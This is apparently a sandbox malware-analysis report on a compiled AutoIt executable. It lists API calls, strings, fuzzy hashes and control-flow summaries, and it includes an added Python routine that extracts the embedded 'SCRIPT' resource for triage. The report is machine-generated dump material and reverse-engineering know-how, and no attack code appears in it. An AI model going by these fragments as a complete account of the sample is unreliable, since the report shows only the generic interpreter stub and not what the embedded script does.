                                                          • Part of subcall function 000C3A46: LoadIconW.USER32(00000063), ref: 000C3A76
                                                          • Part of subcall function 000C3A46: LoadIconW.USER32(000000A4), ref: 000C3A88
                                                          • Part of subcall function 000C3A46: LoadIconW.USER32(000000A2), ref: 000C3A9A
                                                          • Part of subcall function 000C3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000C3AC0
                                                          • Part of subcall function 000C3A46: RegisterClassExW.USER32(?), ref: 000C3B16
                                                          • Part of subcall function 000C39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000C3A03
                                                          • Part of subcall function 000C39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000C3A24
                                                          • Part of subcall function 000C39D5: ShowWindow.USER32(00000000,?,?), ref: 000C3A38
                                                          • Part of subcall function 000C39D5: ShowWindow.USER32(00000000,?,?), ref: 000C3A41
                                                          • Part of subcall function 000C434A: _memset.LIBCMT ref: 000C4370
                                                          • Part of subcall function 000C434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 000C4415
                                                        Strings
                                                        • This is a third-party compiled AutoIt script., xrefs: 000FD279
                                                        • runas, xrefs: 000FD33A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                        • String ID: This is a third-party compiled AutoIt script.$runas
                                                        • API String ID: 529118366-3287110873
                                                        • Opcode ID: 98e5bc7903fc108bb1b0d35b18757e526e0d23419462d1f7f81fbbdf9f5718ea
                                                        • Instruction ID: ea54349a187d843006bf0bbc2a6368dfa2e59e3e5665066a46bde82dc3b2ac2c
                                                        • Opcode Fuzzy Hash: 98e5bc7903fc108bb1b0d35b18757e526e0d23419462d1f7f81fbbdf9f5718ea
                                                        • Instruction Fuzzy Hash: 5951B034908208EACB11EBB4DC46FFD7BBAEB55750F00806DF415A22A3CB705786DB21

                                                        Control-flow Graph

                                                        Control-flow graph of function 000C49A0 (interactive rendering in the original report, with executed and not-executed blocks colour-coded). Main path: c49a0 (call c7667, GetVersionExW, call c7bcc) → c4a15 (call c7d2c, call c7726) → c4a93 (GetCurrentProcess, IsWow64Process) → c4aaf → either c4b2b (GetSystemInfo) → c4af8, or c4ac2 (call c4b37) → either c4b1f (GetSystemInfo) → c4ae9, or c4ad4 (call c4b37) → c4ae3 (GetNativeSystemInfo) → c4ae9 → optionally c4aef (FreeLibrary) → c4af8. The out-of-line blocks at fd767–fd894 are cold branches of the version-string handling that mostly rejoin at c4a93.
                                                        APIs
                                                        • GetVersionExW.KERNEL32(?), ref: 000C49CD
                                                          • Part of subcall function 000C7BCC: _memmove.LIBCMT ref: 000C7C06
                                                        • GetCurrentProcess.KERNEL32(?,0014FAEC,00000000,00000000,?), ref: 000C4A9A
                                                        • IsWow64Process.KERNEL32(00000000), ref: 000C4AA1
                                                        • GetNativeSystemInfo.KERNELBASE(00000000), ref: 000C4AE7
                                                        • FreeLibrary.KERNEL32(00000000), ref: 000C4AF2
                                                        • GetSystemInfo.KERNEL32(00000000), ref: 000C4B23
                                                        • GetSystemInfo.KERNEL32(00000000), ref: 000C4B2F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated dumps and Joe Sandbox IDA Plugin snapshot (hcaresult_0_2_c0000_fFoOcuxK7M.jbxd): same as listed for the first function above
                                                        Similarity
                                                        • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                        • String ID:
                                                        • API String ID: 1986165174-0
                                                        • Opcode ID: b0a770766da2c79ef2c3121390bb464331dd10696258c1ca50cc034aae6e1b6c
                                                        • Instruction ID: c3e1a69b72ec237d190700457e44772904ba45375124a32d103af381cd2bb8e3
                                                        • Opcode Fuzzy Hash: b0a770766da2c79ef2c3121390bb464331dd10696258c1ca50cc034aae6e1b6c
                                                        • Instruction Fuzzy Hash: 4D91C63198D7C4DEC771DB688460AAEBFF5BF3A300B48495ED0CB93A41D620E948D75A

                                                        Control-flow Graph

                                                        Control-flow graph of function 000C4E89 (interactive rendering in the original report, with executed and not-executed blocks colour-coded). Block order: c4e89 (CreateStreamOnHGlobal) → c4ea3 (FindResourceExW) → fd933 (LoadResource) → fd948 (SizeofResource) → fd95c (LockResource) → fd96d–fd98b → c4ec1 (exit). Each of the resource calls branches to c4ec0 → c4ec1 on failure, so the function leaves through the same exit whether or not the SCRIPT resource was found.
                                                        APIs
                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,000C4D8E,?,?,00000000,00000000), ref: 000C4E99
                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,000C4D8E,?,?,00000000,00000000), ref: 000C4EB0
                                                        • LoadResource.KERNEL32(?,00000000,?,?,000C4D8E,?,?,00000000,00000000,?,?,?,?,?,?,000C4E2F), ref: 000FD937
                                                        • SizeofResource.KERNEL32(?,00000000,?,?,000C4D8E,?,?,00000000,00000000,?,?,?,?,?,?,000C4E2F), ref: 000FD94C
                                                        • LockResource.KERNEL32(000C4D8E,?,?,000C4D8E,?,?,00000000,00000000,?,?,?,?,?,?,000C4E2F,00000000), ref: 000FD95F
                                                        Strings
                                                        • SCRIPT (resource name passed to FindResourceExW above; xref not captured in this dump)
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated dumps and Joe Sandbox IDA Plugin snapshot (hcaresult_0_2_c0000_fFoOcuxK7M.jbxd): same as listed for the first function above
                                                        Similarity
                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                        • String ID: SCRIPT
                                                        • API String ID: 3051347437-3967369404
                                                        • Opcode ID: e5bcc279ea97054e45e8a3488aa8b0ac724ac6aadec3c4cf4dabad12688bb718
                                                        • Instruction ID: 9a7ca5c713e8224f7ad152cd1444afd6c8ca269bb51851c29ff98e5c8038f272
                                                        • Opcode Fuzzy Hash: e5bcc279ea97054e45e8a3488aa8b0ac724ac6aadec3c4cf4dabad12688bb718
                                                        • Instruction Fuzzy Hash: 6B115E75240701BFD7218B65EC98F6B7BBAFBC5B11F20426CF50586660DBA1E8418660
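The five API calls in the function above are how a compiled AutoIt executable locates its embedded script: the function first creates an IStream with CreateStreamOnHGlobal, then walks the PE resource tree for type 0000000A (RT_RCDATA) and name SCRIPT with FindResourceExW, and sizes and locks the hit with SizeofResource/LockResource. The Python below reimplements that lookup over a raw .rsrc section so the walk can be run offline. It is an added example, not code from the sample or from Joe Sandbox. Assumptions: the section is constructed in memory by build_sample_rsrc (an RT_ICON decoy plus the RT_RCDATA/SCRIPT entry) at an assumed RVA of 0x20000, and the language-0 handling is simplified to "exact match, else first language entry" rather than the loader's full fallback chain; the IMAGE_RESOURCE_DIRECTORY / _ENTRY / _DATA_ENTRY layouts and RT_RCDATA = 0xA are the real PE definitions.

```python
"""FindResourceExW(h, RT_RCDATA, L"SCRIPT", 0) + SizeofResource + LockResource,
reimplemented over the raw bytes of a PE .rsrc section.

Added example, not the sample's or Joe Sandbox's code. The section is constructed
in memory (build_sample_rsrc) so this runs offline; RSRC_RVA is an assumed address.
"""
import struct

RT_RCDATA = 0x0A                   # the 0000000A passed as lpType in the API list
RSRC_RVA = 0x20000                 # assumed RVA of the constructed .rsrc section
_DIR = struct.Struct("<IIHHHH")    # IMAGE_RESOURCE_DIRECTORY (16 bytes)
_ENTRY = struct.Struct("<II")      # IMAGE_RESOURCE_DIRECTORY_ENTRY (8 bytes)
_DATA = struct.Struct("<IIII")     # IMAGE_RESOURCE_DATA_ENTRY (16 bytes)
_HIGH = 0x80000000                 # high bit: field is an offset to a name / subdirectory


def _read_name(rsrc, off):
    """IMAGE_RESOURCE_DIR_STRING_U: WORD length followed by UTF-16LE chars."""
    (n,) = struct.unpack_from("<H", rsrc, off)
    return rsrc[off + 2:off + 2 + 2 * n].decode("utf-16-le")


def _entries(rsrc, dir_off):
    """Yield (key, child_offset, is_subdir) for every entry of one directory node."""
    _, _, _, _, n_named, n_id = _DIR.unpack_from(rsrc, dir_off)
    pos = dir_off + _DIR.size
    for _ in range(n_named + n_id):
        name, child = _ENTRY.unpack_from(rsrc, pos)
        pos += _ENTRY.size
        key = _read_name(rsrc, name & 0x7FFFFFFF) if name & _HIGH else name
        yield key, child & 0x7FFFFFFF, bool(child & _HIGH)


def _lookup(rsrc, dir_off, key):
    """Match one entry by integer ID or by name (case-insensitive, like the loader)."""
    for k, child, is_subdir in _entries(rsrc, dir_off):
        if isinstance(k, str) and isinstance(key, str):
            if k.upper() == key.upper():
                return child, is_subdir
        elif not isinstance(k, str) and not isinstance(key, str) and k == key:
            return child, is_subdir
    return None


def find_resource(rsrc, rsrc_rva, rtype, name, lang=0):
    """Return (data_rva, size, payload) or None for a missing or malformed resource.
    lang=0 is simplified to "exact match, else first language entry"."""
    try:
        node = (0, True)
        for key in (rtype, name):            # type level, then name level
            node = _lookup(rsrc, node[0], key)
            if node is None or not node[1]:
                return None
        langs = list(_entries(rsrc, node[0]))
        hit = next((e for e in langs if e[0] == lang), None)
        if hit is None and langs:
            hit = langs[0]
        if hit is None or hit[2]:            # language level must hold a data entry
            return None
        data_rva, size, _codepage, _reserved = _DATA.unpack_from(rsrc, hit[1])
    except (struct.error, UnicodeDecodeError):
        return None                          # truncated or corrupted tree
    off = data_rva - rsrc_rva
    if off < 0 or off + size > len(rsrc):
        return None                          # data entry points outside the section
    return data_rva, size, bytes(rsrc[off:off + size])


def extract_autoit_script(rsrc, rsrc_rva=RSRC_RVA):
    """The stub's exact query: type RT_RCDATA, name "SCRIPT", language 0."""
    return find_resource(rsrc, rsrc_rva, RT_RCDATA, "SCRIPT", lang=0)


def build_sample_rsrc(script_blob, rsrc_rva=RSRC_RVA):
    """Constructed .rsrc section: an RT_ICON/1 decoy plus RT_RCDATA/"SCRIPT"/en-US."""
    icon_blob = b"\x00\x00\x01\x00\x01\x00\x10\x10"        # constructed, not a real icon
    o_root, o_t_icon, o_t_rcdata = 0, 32, 56              # type-level directories
    o_n_icon, o_n_script, o_str = 80, 104, 128            # name-level directories, name string
    o_d_icon, o_d_script, o_icon_blob = 144, 160, 176     # data entries, first payload
    o_script_blob = o_icon_blob + len(icon_blob)
    buf = bytearray(o_script_blob + len(script_blob))

    def directory(off, named, ids):      # named entries first, then IDs, as linkers emit
        _DIR.pack_into(buf, off, 0, 0, 0, 0, len(named), len(ids))
        pos = off + _DIR.size
        for key, child, is_subdir in named + ids:
            _ENTRY.pack_into(buf, pos, key, child | (_HIGH if is_subdir else 0))
            pos += _ENTRY.size

    directory(o_root, [], [(3, o_t_icon, True), (RT_RCDATA, o_t_rcdata, True)])
    directory(o_t_icon, [], [(1, o_n_icon, True)])
    directory(o_t_rcdata, [(_HIGH | o_str, o_n_script, True)], [])
    directory(o_n_icon, [], [(0x0409, o_d_icon, False)])
    directory(o_n_script, [], [(0x0409, o_d_script, False)])
    name = "SCRIPT".encode("utf-16-le")
    struct.pack_into("<H", buf, o_str, len("SCRIPT"))
    buf[o_str + 2:o_str + 2 + len(name)] = name
    _DATA.pack_into(buf, o_d_icon, rsrc_rva + o_icon_blob, len(icon_blob), 0, 0)
    _DATA.pack_into(buf, o_d_script, rsrc_rva + o_script_blob, len(script_blob), 0, 0)
    buf[o_icon_blob:o_script_blob] = icon_blob
    buf[o_script_blob:] = script_blob
    return bytes(buf)


if __name__ == "__main__":
    section = build_sample_rsrc(b"constructed script blob")
    print(extract_autoit_script(section))
```

For triage, the same walk over the .rsrc bytes of a real file (pefile exposes them) answers the question this function asks the loader: an RCDATA resource named SCRIPT is the marker of a compiled AutoIt executable, and its payload is the blob that the stub goes on to interpret.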
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated dumps and Joe Sandbox IDA Plugin snapshot (hcaresult_0_2_c0000_fFoOcuxK7M.jbxd): same as listed for the first function above
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID:
                                                        • API String ID: 3964851224-0
                                                        • Opcode ID: 856fd8a804b9196fe2d308818544b8d4194a188ce51a1a2a774bd2a1ef78d9f2
                                                        • Instruction ID: 9cb7e386eb0b7df317da2c4b6424b1c5bd678185419551afa70e92c9c7e96584
                                                        • Opcode Fuzzy Hash: 856fd8a804b9196fe2d308818544b8d4194a188ce51a1a2a774bd2a1ef78d9f2
                                                        • Instruction Fuzzy Hash: 00926B746083419FD720DF14C480B6ABBE5BF89304F14896EE98A9B362D771EC45CBA2
                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(?,000FE398), ref: 0012446A
                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 0012447B
                                                        • FindClose.KERNEL32(00000000), ref: 0012448B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated dumps and Joe Sandbox IDA Plugin snapshot (hcaresult_0_2_c0000_fFoOcuxK7M.jbxd): same as listed for the first function above
                                                        Similarity
                                                        • API ID: FileFind$AttributesCloseFirst
                                                        • String ID:
                                                        • API String ID: 48322524-0
                                                        • Opcode ID: 740e586f659655cb957f8fddf7d2b9a49a0243c3b490a179f6f648b92e4229e9
                                                        • Instruction ID: 0cf3d334226096b2c3c249473f196be035b95b84012b54658c4823f108f96002
                                                        • Opcode Fuzzy Hash: 740e586f659655cb957f8fddf7d2b9a49a0243c3b490a179f6f648b92e4229e9
                                                        • Instruction Fuzzy Hash: 5BE0D87A4109506B52107B38FC0D8EA775C9F06335F10071AF935C11E0E7B499509595
                                                        Strings
                                                        • Variable must be of type 'Object'., xrefs: 00103E62
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated dumps and Joe Sandbox IDA Plugin snapshot (hcaresult_0_2_c0000_fFoOcuxK7M.jbxd): same as listed for the first function above
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Variable must be of type 'Object'.
                                                        • API String ID: 0-109567571
                                                        • Opcode ID: 918191e0bfa6fccae9b68a9d20ed079505de614c635ee01b46efc5ca7be08ff8
                                                        • Instruction ID: f96001180fb89ece9a0abf178c0b66148ac671dd6ebad114cf5d178f93f84d7a
                                                        • Opcode Fuzzy Hash: 918191e0bfa6fccae9b68a9d20ed079505de614c635ee01b46efc5ca7be08ff8
                                                        • Instruction Fuzzy Hash: DCA26875A00245CFCB24CF58C480FAEB7B6FB58310F28816DE956AB391D775AD82CB91
                                                        APIs
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000D0A5B
                                                        • timeGetTime.WINMM ref: 000D0D16
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000D0E53
                                                        • Sleep.KERNEL32(0000000A), ref: 000D0E61
                                                        • LockWindowUpdate.USER32(00000000,?,?), ref: 000D0EFA
                                                        • DestroyWindow.USER32 ref: 000D0F06
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000D0F20
                                                        • Sleep.KERNEL32(0000000A,?,?), ref: 00104E83
                                                        • TranslateMessage.USER32(?), ref: 00105C60
                                                        • DispatchMessageW.USER32(?), ref: 00105C6E
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00105C82
                                                        Strings
                                                        • @COM_EVENTOBJ, @GUI_CTRLHANDLE, @GUI_CTRLID, @GUI_WINHANDLE, @TRAY_ID (AutoIt macro names, taken from the String ID below; xrefs not captured in this dump)
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated dumps and Joe Sandbox IDA Plugin snapshot (hcaresult_0_2_c0000_fFoOcuxK7M.jbxd): same as listed for the first function above
                                                        Similarity
                                                        • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                        • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                        • API String ID: 4212290369-3242690629
                                                        • Opcode ID: c2703f0948580489dba77841391d02fa4869c6941685da2dfeb3817a742a36c7
                                                        • Instruction ID: 404ca454510c48daeddfd85f94d39e74dc9c78524cdc755231b5fc55c9f2ebe8
                                                        • Opcode Fuzzy Hash: c2703f0948580489dba77841391d02fa4869c6941685da2dfeb3817a742a36c7
                                                        • Instruction Fuzzy Hash: A2B29E70608741DFD728DF24C884BAFB7E6BF85304F14491EE589972A2DBB5E884CB52

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00128F5F: __time64.LIBCMT ref: 00128F69
                                                          • Part of subcall function 000C4EE5: _fseek.LIBCMT ref: 000C4EFD
                                                        • __wsplitpath.LIBCMT ref: 00129234
                                                          • Part of subcall function 000E40FB: __wsplitpath_helper.LIBCMT ref: 000E413B
                                                        • _wcscpy.LIBCMT ref: 00129247
                                                        • _wcscat.LIBCMT ref: 0012925A
                                                        • __wsplitpath.LIBCMT ref: 0012927F
                                                        • _wcscat.LIBCMT ref: 00129295
                                                        • _wcscat.LIBCMT ref: 001292A8
                                                          • Part of subcall function 00128FA5: _memmove.LIBCMT ref: 00128FDE
                                                          • Part of subcall function 00128FA5: _memmove.LIBCMT ref: 00128FED
                                                        • _wcscmp.LIBCMT ref: 001291EF
                                                          • Part of subcall function 00129734: _wcscmp.LIBCMT ref: 00129824
                                                          • Part of subcall function 00129734: _wcscmp.LIBCMT ref: 00129837
                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00129452
                                                        • _wcsncpy.LIBCMT ref: 001294C5
                                                        • DeleteFileW.KERNEL32(?,?), ref: 001294FB
                                                        • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00129511
                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00129522
                                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00129534
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                        • String ID:
                                                        • API String ID: 1500180987-0
                                                        • Opcode ID: 7559c021af637dd87973d1f907417ac11c5a9ed32f2a9665140f3f01d7be52b1
                                                        • Instruction ID: 4f397ca4c5290db351c013c3131a90337098bd03a5636dc18339798cac3de09e
                                                        • Opcode Fuzzy Hash: 7559c021af637dd87973d1f907417ac11c5a9ed32f2a9665140f3f01d7be52b1
                                                        • Instruction Fuzzy Hash: 2AC16EB1D00229AEDF11DFA5DC81EDEBBBCEF55310F0040AAF609E6152DB309A958F61

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 000C3074
                                                        • RegisterClassExW.USER32(00000030), ref: 000C309E
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000C30AF
                                                        • InitCommonControlsEx.COMCTL32(?), ref: 000C30CC
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000C30DC
                                                        • LoadIconW.USER32(000000A9), ref: 000C30F2
                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000C3101
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                        • API String ID: 2914291525-1005189915
                                                        • Opcode ID: 244b66933b1c6af08f376e8387802731a3650007f9caaba7f8f15c6e1715481a
                                                        • Instruction ID: e68074a1229920f7a14db9ccabb674aa7c5ba27c43b8df59635879e094773f49
                                                        • Opcode Fuzzy Hash: 244b66933b1c6af08f376e8387802731a3650007f9caaba7f8f15c6e1715481a
                                                        • Instruction Fuzzy Hash: 2A313875841309EFDB10CFA4D889A9EBBF5FB0A310F10416EF580A66A0D7B50681CF91

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 000C3074
                                                        • RegisterClassExW.USER32(00000030), ref: 000C309E
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000C30AF
                                                        • InitCommonControlsEx.COMCTL32(?), ref: 000C30CC
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000C30DC
                                                        • LoadIconW.USER32(000000A9), ref: 000C30F2
                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000C3101
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                        • API String ID: 2914291525-1005189915
                                                        • Opcode ID: 49b31bcf374f58f0976e1505a6cdfa1f4e0a91c1f0f766a672702699ae2f2761
                                                        • Instruction ID: d273d5d17bad30936d2ebdbb64e1fb030a8dce339811186e409c3afdda3a5308
                                                        • Opcode Fuzzy Hash: 49b31bcf374f58f0976e1505a6cdfa1f4e0a91c1f0f766a672702699ae2f2761
                                                        • Instruction Fuzzy Hash: E121E5B9940208EFDB00DFA5E849B9DBBF6FB0A701F00412AF510A67A0D7B546858F91

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 000C4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,001852F8,?,000C37AE,?), ref: 000C4724
                                                          • Part of subcall function 000E050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,000C7165), ref: 000E052D
                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 000C71A8
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 000FE8C8
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 000FE909
                                                        • RegCloseKey.ADVAPI32(?), ref: 000FE947
                                                        • _wcscat.LIBCMT ref: 000FE9A0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                        • API String ID: 2673923337-2727554177
                                                        • Opcode ID: 81b4c42e7b22f45f631432018e2335e0827fe319f00e63a90bf45127c9154100
                                                        • Instruction ID: a7e3bec86fbc6a530fe20b7b52f1c62f6cc9a8d16969cdabaad608bb19cc14b2
                                                        • Opcode Fuzzy Hash: 81b4c42e7b22f45f631432018e2335e0827fe319f00e63a90bf45127c9154100
                                                        • Instruction Fuzzy Hash: 507169711083019EC304EF65EC41AAFBBE9FF85350F40492EF545976B2DB719A89CB62

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 000C3A50
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 000C3A5F
                                                        • LoadIconW.USER32(00000063), ref: 000C3A76
                                                        • LoadIconW.USER32(000000A4), ref: 000C3A88
                                                        • LoadIconW.USER32(000000A2), ref: 000C3A9A
                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000C3AC0
                                                        • RegisterClassExW.USER32(?), ref: 000C3B16
                                                          • Part of subcall function 000C3041: GetSysColorBrush.USER32(0000000F), ref: 000C3074
                                                          • Part of subcall function 000C3041: RegisterClassExW.USER32(00000030), ref: 000C309E
                                                          • Part of subcall function 000C3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000C30AF
                                                          • Part of subcall function 000C3041: InitCommonControlsEx.COMCTL32(?), ref: 000C30CC
                                                          • Part of subcall function 000C3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000C30DC
                                                          • Part of subcall function 000C3041: LoadIconW.USER32(000000A9), ref: 000C30F2
                                                          • Part of subcall function 000C3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000C3101
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                        • String ID: #$0$AutoIt v3
                                                        • API String ID: 423443420-4155596026
